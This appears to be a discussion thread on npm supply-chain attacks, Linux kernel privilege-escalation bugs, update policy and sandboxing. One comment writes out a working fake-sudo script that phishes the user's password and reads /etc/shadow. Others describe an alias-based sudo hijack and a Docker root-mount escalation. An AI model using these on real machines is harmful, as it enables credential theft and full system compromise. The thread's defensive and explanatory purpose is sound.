But it was too convenient. Anyone warning about it or trying to limit the damage was shouted down by people who had no experience of any other way of doing things. "import antigravity" is just too easy to do without.
Well, now we're reaching the "find out" part of the process I guess.
Then I moved to another company where we had builds that access the Internet. We upgrade things as soon as they come out. And people think this is good practice because we're getting the latest bug fixes. CVEs are reviewed by a security team.
Then a startup with a mix of other practices. Some very good. But we also had a big CVE debt. E.g. we had secure boot on our servers and encrypted drives. We had a pretty good grasp on securing components talking to each other, etc.
Everyone seems to think they are doing the right thing. It's impossible to convince the "frequent upgrader" that maybe that's a risk in terms of introducing new issues. We as an industry could really use a better set of practices. Company #1 is my better example in terms of dependency management: in general it had well-established security practices, and we had really secure products.
6-19-2005
My copy of StepMania is turning old enough to drink in like a month and it's still fantastic, software updates are (mostly) a scam.
It means you skip supply chain attacks but may miss fresh vulnerability patches too.
(Naively, not knowing much about apt-get or yum or other OS package managers, I have always assumed that 1. only a handful of trusted people can publish to the default repos for system package managers and 2. that since I have to run `apt-get install` as root anyway, package installers can completely pwn my system if they want to and I am protected purely by trust. Is some of that wrong? If it's right, isn't it nonsensical to be any more worried about installing new packages in light of these vulns?)
It takes 45 seconds to go check how old the copyfail and dirtyfrag vulnerabilities actually are. Which is longer than it takes to read TFA. Dirtyfrag may be relevant to systems from as far back as 2017.
It's not "new" software being affected. And actual old software is in a much worse state because we had a lot more time to find their problems.
I am worried that the sluggishness appeared about the same time on both devices
I don't remember where I read it, but it basically boils down to need vs want.
I've used that rule for deciding between a new car or used. A fancy vacuum or basic.
A shiny new gadget.
Bringing new things into the tech stack.
Picking a new tech stack.
For example, at one company I worked for, they created an ACL model for applications that essentially enforced rules like: “Application X in namespace A can communicate with me.” This ACL coordinated multiple technologies working together, including Kubernetes NetworkPolicies, Linkerd manifests with mTLS, and Entra ID application permissions. As a user, it was dead simple to use and abstracted away a lot of things I do not know that well.
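The Kubernetes piece of such a rule might look roughly like this; a sketch with hypothetical names and labels (the real tooling generated the Linkerd and Entra ID parts alongside it):

kubectl apply -f - <<'EOF'
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-from-application-x   # hypothetical
  namespace: namespace-b
spec:
  podSelector:
    matchLabels:
      app: me
  ingress:
    - from:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: namespace-a
          podSelector:
            matchLabels:
              app: application-x
EOF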
The important part is not the specific implementation, but the mindset behind it.
An upgrade can both fix existing issues and introduce new ones. However, avoiding upgrades can create just as many problems — if not more — over time.
At the same time, I would argue that using software backed by a large community is even more important today, since bugs and vulnerabilities are more likely to receive attention, scrutiny, and timely fixes.
Programming-language packages are an issue only because we don't have zero trust for modules: no restrictions on opening sockets or the file system. The issue is not the count; a pure function like leftPad can't hurt you.
Big companies have security roles on multiple levels, enforcing policies and not allowing devs to just install any package. That's not new but started maybe 15 years ago.
Whether to do constant npm upgrades to keep the high-priority security issues count at zero (for what seems like about 15 minutes), or whether to hang back a bit to avoid catching the big one that everyone knows is coming real soon now.
Not enjoying npm at all.
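The treadmill in one command:

npm audit --audit-level=high   # zero highs again... for about 15 minutes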
If you can't trust your update sources, you have bigger problems.
Edit: I think I understand. copyfail is a kernel bug that lets a malicious npm package get root access on your Linux server, right?
So now, while there are unpatched servers, is when it would be the perfect time for attackers to target NPM packages.
And the advice isn't just "update your kernel" because we are still finding new related issues?
What I want to say with that is: fundamentally, our world works because at least most people do not abuse shit. That is fundamentally how human society has always worked, and will likely continue to do so.
echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.bashrc
mkdir -p ~/.local/bin
# Quoted 'EOF' so $USER and $PASSWORD survive into the script
# instead of being expanded (to nothing) right now.
cat <<'EOF' > ~/.local/bin/sudo
#!/bin/bash
# Fake sudo: phish the password, then use it for real.
read -rs -p "[sudo] password for $USER: " PASSWORD
echo ""
echo "$PASSWORD" | /usr/bin/sudo -S head /etc/shadow
EOF
chmod +x ~/.local/bin/sudo
The attack fires on the next sudo call and shows data accessible only to root. Our security model is based on distributions verifying packages, that is, distro maintainers. Software we can't trust should run in VMs. The attack on trivy is just the beginning; the solution is removing pip, uv, npm, and rbenv from the host and running them in Docker containers:
$ docker run -it -v "$PWD":/app -w /app node:alpine /bin/sh
Longer-term environments can be defined in Docker Compose (docker-compose.yml):
services:
  app:
    image: node:alpine
    volumes:
      - .:/app
    working_dir: /app
    command: /bin/sh
$ docker compose run app
Switch to Kata etc. if more protection is needed. Eventually all userspace will run in VMs. Behaviours matter more than OS security primitives.
People lamented semver not being trustable but that ship sailed a long time ago, and supply chain attacks are going to get worse before they get better.
Our team is pretty minimal when it comes to enforced hooks (everyone has their own workflow) but no one could come up with an objection to this one.
But the problem is that this could lead to abuse of the CVE system to try to force rapid adoption of attacked packages. What prevents this?
What are people thinking with these meme style vulnerability names? It's going to be hard to pitch "we need to push back the timeline on this new infrastructure deploy while we mitigate Copy Fail 2: Electric Boogaloo".
We set up our base containers with all the external dependencies already in them and then only update those explicitly when we decide it's time.
This means we might be a bit behind the bleeding edge, but we're also taking on a lot less risk with random supply chain vulns getting instant global distribution.
Just alias sudo to sudo-but-also-keep-password-and-execute-a-payload in ~/.bashrc and wait up to 24 hours. Maybe also simulate some breakage by intercepting other commands and force the user to run 'sudo systemctl' or something sooner rather than later.
I switched to llama.cpp because of that.
To me it feels more and more that the slopcode world is the opposite philosophy of reproducible builds. It's like the anti methodology of how to work in that regard.
Before, everyone was publishing breaking changes in subminor versions because nobody adhered to any API-versioning standards. Now it's every commit that can break things. That is not an improvement.
Today I’m limiting exposure to dependencies more than ever, particularly for things that take a few hundred lines to implement. It’s a paradigm shift, no less.
We should have:
- OS level capabilities. Launched programs get passed a capability token from the shell (or wherever you launched the program from). All syscalls take a capability as the first argument. So, "open path /foo" becomes open(cap, "/foo"). The capability could correspond to a fake filesystem, real branch of your filesystem, network filesystem or really anything. The program doesn't get to know what kind of sandbox it lives inside.
- Library / language capabilities. When I pull in some 3rd party library - like an npm module - that library should also be passed a capability too, either at import time or per callsite. It shouldn't have read/write access to all other bytes in my program's address space. It shouldn't have access to do anything on my computer as if it were me! The question is: "What is the blast radius of this code?" If the library you're using is malicious or vulnerable, we need to have sane defaults for how much damage can be caused. Calling lib::add(1, 2) shouldn't be able to result in a persistent compromise of my entire computer.
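Nothing gives you the library-level version today, but the process-level half can be approximated with existing tools; a rough sketch with bubblewrap, assuming ./untrusted-tool is the program being contained:

# The tool sees a filesystem and network it can't distinguish from
# the real thing; there's just less of them.
bwrap --ro-bind / / \
  --dev /dev --proc /proc \
  --tmpfs "$HOME" \
  --bind "$PWD" "$PWD" --chdir "$PWD" \
  --unshare-net \
  ./untrusted-tool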
SeL4 has fast, efficient OS-level capabilities. It's had them for years. They work great. They're fast, faster than Linux in many cases, and tremendously useful. They allow for transparent sandboxing, userland drivers, IPC, security improvements, and more. You can even run Linux as a process in seL4. I want an OS that has all the features of my Linux desktop, but works like seL4.
Unfortunately, I don't think any programming language has the kind of language level capabilities I want. Rust is really close. We need a way to restrict a 3rd party crate from calling any unsafe code (including from untrusted dependencies). We need to fix the long standing soundness bugs in rust. And we need a capability based standard library. No more global open() / listen() / etc. Only openat(), and equivalents for all other parts of the OS.
If LLMs keep getting better, I'm going to get an LLM to build all this stuff in a few years if nobody else does it first. Security on modern desktop operating systems is a joke.
We need a cultural shift toward code hygiene, which isn't really any different from the norms most cultures develop around food. It's a mix of crude heuristics but the sense of "eeew" is keeping billions of people alive.
Assuming we survive the gap period where every country chucks what they still have at their worst enemies, I mean. I suppose we can always hit each other with animal bones.
I would count myself as a "frequent upgrader" - I admin a bunch of Ubuntu machines and typically set them to auto-update each night. However, I am aware of the risks of introducing new issues, but that's offset by the risks of not upgrading when new bugs are found and patched. There's also the issue of organisations that fall far behind on versions of software which then creates an even bigger problem, though this is more common with Windows/proprietary software as you have less control over that. At least with Linux, you can generally find ways to install e.g. old versions of Java that may be required for specific tools.
There's no simple one-size-fits-all and it depends on the organisation's pool of skills as to whether it's better to proactively upgrade or to reluctantly upgrade at a slower pace. In my experience, the bugs introduced by new versions of software are easier to fix/workaround than the various issues of old software versions.
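For reference, the nightly auto-update setup is usually just the stock tooling; a minimal sketch, assuming Ubuntu's defaults (security updates only):

sudo apt-get install unattended-upgrades
sudo dpkg-reconfigure -plow unattended-upgrades   # writes /etc/apt/apt.conf.d/20auto-upgrades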
The post in question points at dependency package managers such as NPM, which has pre- and post-build scripts, install scripts, etc., not system packages.
It's much easier to break into an NPM/Github account and push malicious commits in the few hours a maintainer is sleeping than it is to push something out and not have it noticed for 2 weeks.
There are lists of attacks which had an exposure window which was much shorter than 2 weeks:
https://daniakash.com/posts/simplest-supply-chain-defense/ https://blog.yossarian.net/2025/11/21/We-should-all-be-using...
I like to think people would agree more on the appropriate method if they saw the risk as large enough.
If you could convince everyone that a nuclear bomb would get dropped on their heads (or a comparably devastating event) if a vulnerability gets in, I highly doubt a company like #2 would still believe they're doing things optimally, for example.
And yes, they still thought they were doing the right thing.
Yes, I mean crates like anyhow and syn.
https://blog.plan99.net/why-not-capability-languages-a8e6cbd...
But as pointed out by others, this particular exploit wouldn't be stopped by capabilities. Nor would it be stopped by micro-kernels. The filesystem is a trusted entity on any OS design I'm familiar with as it's what holds the core metadata about what components have what permissions. If you can exploit the filesystem code, you can trivially obtain any permission. That the code runs outside of the CPU's supervisor mode means nothing.
The only techniques we have to stop bugs like this are garbage collection or use of something like Rust's affine type system. You could in principle write a kernel in a language like C#, Java or Kotlin and it would be immune to these sorts of bugs.
Which is to say: Hiding the sausage-making is a core aspect of what makes supply chains profitable.
Nuclear might be airgapped but what about water, power…?
That's why I don't understand:
> If everyone starts waiting a week, their exploits will wait 2 weeks
This naturally doesn't work outside corporations.
The proper response, from them and from you, should be to make sure there is some isolation between user space and root, like gVisor.
In my book, having unattended-upgrades or windows update run amok on your system is functionally worse than a rootkit.
Package managers aren't going anywhere. Even languages that historically bet on large standard libraries have been giving up on that over time (e.g. Java's stdlib comes with XML support but not JSON).
Unfortunately, LLMs are also not cheap enough to just create whole new PL ecosystems from scratch. So we have to focus on the lowest hanging fruits here. That means making sandboxing and containers far more available and easy for developers. Nobody should run "npm install" outside a sandbox.
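A minimal version of that, assuming Docker is available and the project needs nothing outside its own directory:

# Lifecycle scripts disabled, nothing but the project dir mounted,
# container discarded afterwards.
docker run --rm -it -v "$PWD":/app -w /app node:alpine \
  npm ci --ignore-scripts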
Those exploits are in the kernel, and userspace is only making normal, allowed calls. Replacing global open()/listen()/etc. with capability-based versions would still allow one to invoke the same kernel bugs.
(Now, using a microkernel like seL4 where the kernel drivers are isolated _would_ help, but (1) that's independent of what userspace does, you can have a POSIX layer on seL4, and (2) that would be way more context switches, so a performance drop)
I prefer its model of declaring what I want to use; any calls to code outside that error out.
They don't wait for the cultures to come back negative to say yes, either. They just eat what they are served.
We're seeing maintainers retreat from maintaining because the amount of AI slop being pushed at them is too much. How many are just going to hand over the maintenance burden to someone else, and how many of those new maintainers are going to be evil?
The essential problem is that our entire system of developing civilisation-critical software depends on the goodwill of a limited set of people to work for free and publish their work for everyone else to use. This was never sustainable, or even sensible, but because it was easy we based everything on it.
We need to solve the underlying problem: how to sustainably develop and maintain the software we need.
A large part of this is going to have to be: companies that use software to generate profits paying part of those profits towards the development and maintenance of that software. It just can't work any other way. How we do this is an open question that I have no answers for.
Auto-installing random software is the problem. It was a problem when our parents did it, why would it be a good idea for developers to do it?
> any useful piece of software has been fuzz tested, property tested and formally verified.
That would require effort. Human effort and extra token cost. Not going to happen; people would rather move fast and break things.
https://github.com/artifact-keeper
An artifact manager. Only get what you approve. So you can get fast updates when needed and consistently known stable when you need it. Does need a little config override - easy work.
I had my own janky tooling for something like it. This is a good project.
Once noticed, that's where the exploit explosion erupts, excited exploiters everywhere, emboldened... enticed... excessively encouraged, by your delayed updates.
Another model is Perl's CPAN where you publish source files only.
If you expose people to the true risks instead of allowing them to be ignorant, the conclusion that they might come to is that they shouldn’t develop software at all.
If a popular NPM package was compromised and included a copy.fail exploit, it would make lots of systems vulnerable to root privilege escalation.
The advice isn't just "update your kernel" because there is no update. The latest vulnerability (the one discovered after copy.fail) still has no fix.
I've studied security culture before, and in most cases everything comes down to a sliding scale with security on one side and convenience/accessibility on the other: the more secure something is, the less accessible it is, and vice versa.
[0] https://www.youtube.com/watch?v=LTI0SeyhAPA
docker run --rm -it -v '/:/mnt' -u 'root' 'alpine' '/bin/sh' '-l'
Chances are that the person who set up Docker didn't do it properly.

Even worse are the “extension packs” that combine some normal things and one wonky thing nobody’s ever heard of…
The preference is for usability over security.
Famously: https://vez.mrsk.me/freebsd-defaults
I appreciate your work on the project, but I can’t in good conscience suggest people switch while there are such bad defaults.
https://lwn.net/Articles/850098
https://news.ycombinator.com/item?id=26507507
tl;dr: deeply insecure WireGuard implementation committed directly into the FreeBSD kernel with zero review.
Was this process problem fixed?
Please grow a brain.
If you have code execution, you can attack the OS.
That being said, I'm not suggesting that anyone should judge an entire OS based off of how they handle a single minor report, since everything else that I've seen suggests that FreeBSD takes security reports quite seriously. But then you could also use this same argument for the Linux kernel bug, since it's pretty rare for a patch to be mismanaged like this there too :)
[0]: https://www.maxchernoff.ca/p/luatex-vulnerabilities#timeline
It's a problem we have to live with for the sake of progress and for security updates. Every machine needs downtime for maintenance on a periodic, often-scheduled basis. It might cost time but avoiding updates is not a good plan.
Aside from dodgy updates that have to run as root to install, if you have passwordless sudo it's more dangerous than any broken package or local-only privilege escalation exploit. I'll wager many have it set up that way, because typing passwords is tiresome.
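Checking whether you're in that camp is quick:

sudo grep -R NOPASSWD /etc/sudoers /etc/sudoers.d/
# A hit like "yourname ALL=(ALL) NOPASSWD: ALL" means any code running
# as your user is already root on demand, no password phishing needed.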
But being able to have agents implement perl5 in Rust and make it faster and more secure raises many questions about the role of open source and the consequences for security and supply-chain risk.
Yes they would. Copyfail uses a bug in the linux kernel to write to arbitrary page table entries. A kernel like SeL4 puts the filesystem in a separate process. The kernel doesn't have a filesystem page table entry that it can corrupt.
Even if the bug somehow got in, the exploit chain uses the page table bug to overwrite the code in su. This can be used to get root because su has suid set. In a capability based OS, there is no "su" process to exploit like this.
A lot of these bugs seem to come from linux's monolithic nature meaning (complex code A) + (complex code B) leads to a bug. Microkernels make these sort of problems much harder to exploit because each component is small and easier to audit. And there's much bigger walls up between sections. Kernel ALG support wouldn't have raw access to overwrite page table entries in the first place.
> (2) that would be may more context switches, so a performance drop
I've heard this before. Is it actually true though? The SeL4 devs claim the context switching performance in sel4 is way better than it is in linux. There are only 11 syscalls - so optimising them is easier. Invoking a capability (like a file handle) in sel4 doesn't involve any complex scheduler lookups. Your process just hands your scheduler timeslice to the process on the other end of the invoked capability (like the filesystem driver).
But SeL4 will probably have more TLB flushes. I'm not really sure how expensive they are on modern silicon.
I'd love to see some real benchmarks doing heavy IO or something in linux and sel4. I'm not really sure how it would shake out.
Languages with rich standard libraries provide enough common components that it's feasible to build things using only a small handful of external dependencies. Each of those can be carefully chosen, monitored, and potentially even audited, by an individual or small team.
That doesn't make the resulting software exploit-proof, of course, but it seems to me much less risky than an ecosystem where most programs pull in hundreds of dependencies, all of which receive far less scrutiny than a language's standard library.
If the restaurant has a foul smell and the food is served by a twitchy waiter who insists that the food is totally free, I think most people will think twice.
yolo!
From TFA:
> Right now would be one of the best times for a supply chain attack via NPM to hit hard.
Given the local kernel root exploits, people pulling npm dependencies have an extra high chance of getting rooted. This includes test systems, build systems, the web server running node.js backend, etc. etc. etc.
This means that there is a significantly greater chance that whatever software you download (not necessarily npm-based) on the internet in these couple days has been unknowingly infected with backdoors, simply due to the fact that the vast majority of servers out there that use npm code have easily exploitable vulnerabilities.
Rivers caught on fire for a hundred years before the EPA was formed.
* with internet access to FOSS via sourceforge and github we got an abundance of building blocks
* with central repositories like CPAN, npm, pip, cargo and docker those building blocks became trivially easy to use
Then LLMs and agents added velocity to building apps and producing yet more components, feeding back into the dependency chain. Worse: new code with unattributed reuse of questionable patterns found in unknowable versions of existing libraries. That is, implicit dependencies on fragments of a multitude of packages.
This may all end well ultimately, but we're definitely in for a bumpy ride.
Attackers can’t push a security update without going through the reporting process (e.g. Github CVE), so they can’t necessarily abuse that easily.
Anyway, the point of parent and me wasn't that it was considered to be a "mistake", but people thinking they "are doing the right thing".
No one in this thread proposed that, or anything that could be reasonably assumed to have meant that.
As for the parent comment about not using the lockfile for the production build, that’s just incredibly incompetent.
Maybe they should hire someone who knows what they are doing. Contrary to the popular beliefs of backend engineers online, you also need some competency to do frontend properly.
In this case what's needed is "npm ci" instead of "npm install", or better, "pnpm install --frozen-lockfile".
Pnpm will also do that automatically if the CI environment variable is set.
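Concretely:

npm ci                            # installs exactly what package-lock.json says, or fails
pnpm install --frozen-lockfile    # same idea; the default when CI=true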
I personally switched away from macOS with this being one of the reasons, after having realized brew will eventually compromise my system with their antics.
So the issue is bigger than the mishandling of a single issue, it’s a fundamental process issue around security for one of the most impactful projects in the entire space.
One idea I've been entertaining is to not allow transitive imports in packages. It would probably lead to far fewer and more capable packages, and a bigger standard library. Much harder to imagine a left-pad incident in such an ecosystem.
That isn't a guarantee either, just last month someone compromised the Axios library.
- Pledge requires the program drop privileges. Process level caps move the "allowed actions" outside of an application. And they can do that without the application even knowing. This would - for example - let you sandbox an untrusted binary.
- Pledge still leaves an entire application in the same security zone. If your process needs network and disk access, every part of the process - including 3rd party libraries - gets access to the network and disk.
- You can reproduce pledge with caps very easily. Capability libraries generally let you make a child capability. So, cap A has access to resources x, y, z. Make cap B with access to only resource x. You could use this (combined with a global "root cap" in your process) to implement pledge. You can't use pledge to make caps.
Right now it kinda feels to me like "Open Source" is the Russian army, relying on sheer numbers and a huge quantity of equipment, much of which is decades old.
Meanwhile attackers and bug hunters are like the Ukrainians, using new, inexpensive, and surprisingly powerful tools that none of the Open Source community has ever seen in the past, and for which it has very little defence capability.
The attackers with cheap drones or LLMs are completely overwhelming the old school who perhaps didn't notice how quickly the world has changed around them, or did notice but cannot do anything about quickly enough.
I run a distro that often causes software like this to break because their silent automatic installation typically makes assumptions about Linux systems which don’t apply to mine. However I fear for the many users of most typical distros (and other OS’ in general as it’s not just a Linux-only issue) who are subject to having all sorts of stuff foisted onto their system with little to no opportunity to easily decide what is being heaped upon them.
This is one force that operates. Another is that, in an effort to avoid depending on such a big attack surface, people are increasingly rolling their own code (with or without AI help) where they might previously have turned to an open source library.
I think the effect will generally be an increase in vulnerabilities, since the hand-rolled code hasn't had the same amount of time soaking in the real world as the equivalent OS library; there's no reason to assume the average author would magically create fewer bugs than the original OS library authors initially did. But the vulnerabilities will have much narrower scope: If you successfully exploit an OS library, you can hack a large fraction of all the code that uses it, while if you successfully exploit FooCorp's hand-rolled implementation, you can only hack FooCorp. This changes the economic incentive of funding vulnerabilities to exploit -- though less now than in the past, when you couldn't just point an LLM at your target and tell it "plz hack".
More people are producing more code because of easier tools. Most code is bad. But that's not the tools' fault.
And in the end it is a problem of processes and culture.
Reviewing upstream diffs for every package requires a lot of man-hours, and most packagers are volunteers. I guess LLMs might help catch some obvious cases.
this is on some ancient node 16 build i was trying to clean up ci for, so not very recent npm
I don't think it's reasonable to say that an OS that lacks it isn't "serious" about security.
FreeBSD isn’t secure, I suspect you’re sitting on a pile of 0 days for it?
With FreeBSD there's never any question of "who should this get reported to".
Something that concerns me more is I use things like gemini-cli or claude-cli via their own non-sudo accounts, with no ssh keys or anything, on my laptop, but an LPE means they can find a way around such restrictions if they feel like it (and they might).
VM isolation would still be safe even with these kernel exploits.
As always, I know most of us work in IT, but things rarely are actually binary.
They’re always racing to be the first one to write an article about a case.
[0] https://news.ycombinator.com/item?id=47513932
[1] https://github.com/npm/cli/issues/8570
[2] https://socket.dev/blog/npm-introduces-minimumreleaseage-and...
this is only scary for rootless containers, as it skips an isolation layer. but we've started shipping distroless containers, which are not vulnerable to this because they lack privilege-escalation commands such as su or sudo.
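for anyone who hasn't poked at one, gcr.io/distroless/static-debian12 is one of the published base images:

docker run --rm -it gcr.io/distroless/static-debian12 /bin/sh
# fails immediately: the image ships no /bin/sh, no su, no sudo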
never trust software to begin with, sandbox everything you can and don't run it on your machine to begin with if possible.
> Because the responsible disclosure schedule and the embargo have been broken, no patch exists for any distribution.
I had to do a double take reading that. It reads as if something happened that prevented them from following a schedule, yet they seemingly chose to release the information anyway. I hope I'm missing something, like it being forcibly disclosed elsewhere.
Edit: Moments later I refreshed the homepage and saw the announcement. They do claim to have consulted with maintainers
the idea that it exists at all is more or less a gentleman's agreement in the engineering world anyway
The problem is that the UNIX shell model got very successful and is now also used on other platforms with poor package management, so all the language-level packaging system were created instead. But those did not learn from the lessons of Linux distributions. Cargo is particularly bad.
To me it’s easier to get a program to let the system know what it needs vs. try to contain it from the outside.
Anyway, have a good one.
Who exactly is the innocent little Ukraine supposed to be that the big bad open source is supposed to be attacking to, what? take their land and make the OSS leader look powerful and successful at achieving goals to distract from their fundamental awfulness? And who are the North Korean cannon fodder purchased by OSS while we're at it?
Yeah it's just like that, practically the same situation. The authors of gnu cp and ls can't wait to get, idk, something apparently, out of the war they started when they attacked, idk, someone apparently.
Not everyone installs only what is available in pkgsrc.
If it does, doesn't that defeat the purpose? If a package is compromised, of course the compromiser will just label their new version as a "security update".
These days most exploits cannot persist through a reboot, thanks to Secure Boot and other boot-chain attestations. During boot, everything loaded gets checksummed and compared against signatures signed by Apple, but this only helps at load time, not while the phone is running. Of course, if the phone is not patched, the exploit could be reloaded, but that would require revisiting a malicious website or reopening a malicious bit of media.
Also, IME we don't deep dive everything (should we?)
For most stuff we make sure the latest is not-shit and passed test cases. We do have ceremony around version bumps.
Regular phone reboots are a security measure at this point.
If no one is willing to stand up and say "yes this is safe and of acceptable quality", why use it?
It's a software engineering version of the professional engineering stamp.
In general, use of npm ci is usually sparsely documented - most node projects you can find just recommend using npm install during the setup, suggesting a failure in promoting its availability (I only know of it because I got frustrated that the lockfile kept clogging up git commits whenever I added dependencies with what looked like auto-generated build-time junk).
For local attackers there may be easier avenues to leak the ASLR slide, but for remote attackers it's almost universally agreed it significantly raises the bar.
>I don't think it's reasonable to say that an OS that lacks it isn't "serious" about security.
When they implemented it in 2019 it had been an 18-year-old mitigation. If you are serious about security, you implement everything that raises the bar. The term "defense-in-depth" exists for a reason, and ASLR is probably one of the easiest and most effective defense-in-depth measures you can implement that doesn't necessarily require changes from existing code other than compiling with -pie.
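For userland binaries the cost really is just a compile flag; a sketch for a C program on Linux:

# Position-independent executable so ASLR can randomize the program base:
cc -fPIE -pie -o server server.c
file server   # should report a "pie executable" on most Linux systems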
This is exactly why some (including me) don't take these projects seriously. Like you claim to design a language for security, and this is how you tell me to install it????
Many Golang projects I see in the wild will import a number of dependencies with significant feature overlap with sections of the standard library, or even be intended as a replacement for them. So it seems that having an expansive stdlib isn’t sufficient to avoid deep dependency trees, it probably helps to some degree but it’s definitely not a panacea.
They're not either, every one of these projects contains a gigantic vendor/ folder full of unmaintained libraries, modified so much that keeping up with the latest changes is impossible so they're stuck with whatever version they copied back in 2009.
Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge cases properly.
For supply chain security and bug count, I'll take a focused custom implementation of specific features over a library full of generalized functionality.
Have you read this old code? It's terrible, often written in C with no care at all for security. AI is much, much better at writing code.
this is a cornerstone of modern software development. If it died, or if got taken over by a malicious entity, every single company on the planet would have an immediate security problem. Yet the experience of that maintainer is bad verging on terrible [1].
We need to do better than this.
Not sure what you mean by this. Debian is able to handle coordinated disclosures (when they're actually coordinated), and get embargoed security updates out rapidly without breaking the embargo.
Is there some other aspect of this that you're referencing?
Infecting sudo just makes for a quick demo.
If your container has different processes at different user ids, the exploit would still be effective.
It would likely also be able to “modify” read only files mapped from the host.
When I see pages of obviously generated prose being submitted as any kind of documentation, my eyes just glaze over. I feel so guilty sharing similar stuff too, though to my credit, at least I always lead with a self-written TLDR, the slop is just for reference. But it's so bad, like genuinely distressing tier. I don't want to read all that junk, and more and more gets produced.
Prose type docs have always been my Achilles heel, and this is like the worst possible evolution of that.
For a brief period in the past few weeks, they somehow managed to make a change to ChatGPT Thinking that made it succinct. The tone was super fact-oriented too. It was honestly like waking up from a fever dream.
I don't doubt that the patch reversal + exploit PoC made by a third party is the result of people figuring out how patches work in open source projects like these.
Anyone with access to a good enough LLM can scour through supposedly minor bug fixes that might hide a critical vulnerability, rather than doing it all manually. The LLM will probably throw up tons of false positives and miss half the issues, but you only need one or two successes.
But there are a lot of academic and research institutions that actually do have good Linux user management. I worked at a pediatric hospital, and the RHEL HPC admins did not mess around in terms of who was allowed to access which patients' data. As someone who was not an admin, it was a huge pain and it should have been. So this bug has pretty serious implications, seems like anyone at that hospital can abscond with a lot of deidentified data. [research HPC not as sensitive as the clinical stuff, which I think was all Windows Server]
Very odd wording. I assume there’s an interesting/upsetting story here that will come out soon.
I won't go into all the details but... it's totally possible to not have the sudo command (or similar) on a system at all, and to have su with the setuid bit off.
On my main desktop there's no sudo command there are zero binaries with the setuid bit set.
The only way to get root involves an "out-of-band" access, from another computer, that is not on the regular network [1].
This setup has worked for me for years. And years. And I very rarely need to be root on my desktop. When I do, I just use my out-of-band connection (from a tiny laptop whose only purpose is to perform root operations on my desktop).
For example today: I logged in as root and blocked the three modules with the "dirty page" mitigation suggested by the person who reported the exploit.
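The shape of that mitigation, with hypothetical module names (the advisory lists the real ones):

cat <<'EOF' > /etc/modprobe.d/blacklist-dirtypage.conf
# "install <module> /bin/false" blocks loading outright; a plain
# "blacklist" line only disables auto-loading.
install module_one /bin/false
install module_two /bin/false
install module_three /bin/false
EOF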
You're not faking sudo with a mocking-bird on my machine. You're not using "su" from a regular user account. No userns either (no "insmod", no nothing).
Note that it's still possible to have several non-root users logged in at once: but from one user account, you cannot log in as another. You can however switch to TTY2, TTY3, etc. and log in as another user. And the whole XKCD about "get local account, get everything of importance" ain't valid either in my case.
I'm not saying it's perfect but it's not as simple as "get a local shell, wait until user enters 'sudo', get root". No sudo, no su.
It's brutally simple.
And, best of all, it's a fully usable desktop: I've been using such a setup for years (I've also got servers, including at home, with Proxmox and VMs etc., but that's another topic).
> Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge cases properly.
This isn't really an argument in favour of having the average programmer reimplement stuff, though. For it to be, you'd have to argue that the leftpad author was unusually sloppy. That may be true in this specific case, but in general, I'm not persuaded that the average OSS author is worse than the average programmer overall. IMHO, contributing your work to an OSS ecosystem is already a mild signal of competence.
On the wider topic of reimplementation: Recently there was an article here about how the latest Ubuntu includes a bunch of coreutils binaries that have been rewritten in Rust. It turns out that, while this presumably reduced the number of memory corruption bugs (there was still one, somehow; I didn't dig into it), it introduced a bunch of new vulnerabilities, mostly caused by creating race conditions between checking a filesystem path and using the path for something.
But I think most OSS code isn't like this -- even C code born long ago, if it's still in wide use, has been hardened by now. Examples: Linux kernel, GNU userland, PostgreSQL, Python.
>He emphasized that he has released curl under a free license, so there is no legal problem with what these companies are doing. But, he suggested, these companies might want to think a bit more about the future of the software they depend on.
There is little reason for minimal-restriction licenses to exist other than to allow corporate use without compensation or contribution. I would think by now that any hope that they would voluntarily be any less exploitative than they can would have been dashed.
If you aren't getting paid or working purely for your own benefit, use a protective license. Though, if thinly veiled license violation via LLM is allowed to stand, this won't be enough.
This opposed to closed off “products” that change at the whims of the company owning it.
They are completely independent operating systems with a distant shared history.
Whereas on Linux, the distros are taking a common Linux kernel source, and combining it with their choice of common userlands like GNU. Debian has the same kernel and GNU userland that Arch and Fedora use. That is how Linux distros are "distros" whereas the BSDs are independent operating systems.
> we're in a similar space -- http://www.getdropbox.com (and part of the yc summer 07 program) basically, sync and backup done right (but for windows and os x). i had the same frustrations as you with existing solutions.
> let me know if it's something you're interested in, or if you want to chat about it sometime.
>drew (at getdropbox.com)
but they all have something in common: the issue is that your user is compromised, which means the applications running as that user are compromised. the only thing you gain is that you can trust your system, i.e. trust that the system itself is not compromised, which is only relevant for infrastructure; if your user is compromised you're already fucked. multi-user setups with untrusted accounts are inherently insecure, and in infrastructure the blast radius might be thousands of users of that service.
the breakdown looks something like this:
- you heavily compromise a single user <- exploit not relevant
- you compromise a shared setup via a bad user to compromise a lot of users <- should never be used anymore, namespace isolation is the replacement
- you somewhat compromise a lot of users via infra compromise <- where this hurts

That's my main reason to use "sudo" on the desktop.
I suppose I could install every piece of software locally, either from source or via flatpak, but this is a lot of work and much harder than doing it the easy way and using global install via my distro. Plus, non-distro installs are much more likely to be out of date and contain vulnerabilities of their own.
Most people however aren't and will happily run sudo after an npm postinstall script tells them to apt-install turboencabulator for their new frontend framework to function.
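One cheap mitigation is making the scripts themselves a conscious step, which npm supports natively:

npm config set ignore-scripts true   # lifecycle scripts now require opting back in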
there's nothing stopping you from using python from 2009 except why would you want to do that to yourself - but the same strategy applies. the reference python implementation is written in C, after all.
There have been two LPE vulnerabilities and exploits in the Linux kernel announced today. After the one announced just last week. I don't think as much of the C code born long ago has been as carefully hardened as you think.
(Copy Fail 2 and Dirty Frag today, and Copy Fail last week)
There’s a lot of misconception about how open source comes to be. Only a very small part of it, still significant of course, was really created for the benefit of a community. There are exceptions, but dig into the organisational culture and origins and you’ll see the pattern. Also, thousands of projects are made for the satisfaction of the author himself, being highly intelligent and high on algorithmic dopamine.
There's a bunch of problems with getting companies to pay for this, too - that sense of entitlement (or even contractual obligation), the ability to control the project with cash, etc.
I don't have any answers or solutions. But I don't think we can hand-wave the problem away.
1. No strong stack protectors.
2. No kASLR.
That's 20-year-old exploit methodology.
Real-world reasons I can think of: it might grow in the future and you want to allow flexibility for that; it might be the input to or output from some external system that requires XML; your team might have standardised on always using XML config files; and introducing yet another custom plain-text file format just creates unnecessary cognitive load for everyone who has to use it.
